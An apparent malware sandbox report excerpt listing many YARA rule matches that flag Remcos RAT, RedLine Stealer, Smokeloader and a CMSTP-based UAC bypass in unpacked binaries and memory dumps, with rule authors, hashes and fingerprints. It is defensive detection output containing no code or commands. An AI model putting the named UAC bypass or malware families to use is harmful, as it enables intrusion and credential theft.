Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ltlbVjClX9.exe.2130e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ltlbVjClX9.exe.2130e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.yavascript.exe.1f80e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.3.ltlbVjClX9.exe.21b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.3.yavascript.exe.2180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.3.ltlbVjClX9.exe.21b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.3.yavascript.exe.21c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.2513143474.0000000000828000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2409581166.0000000000654000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.2463923706.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.4474590588.0000000000553000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000003.2097956530.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
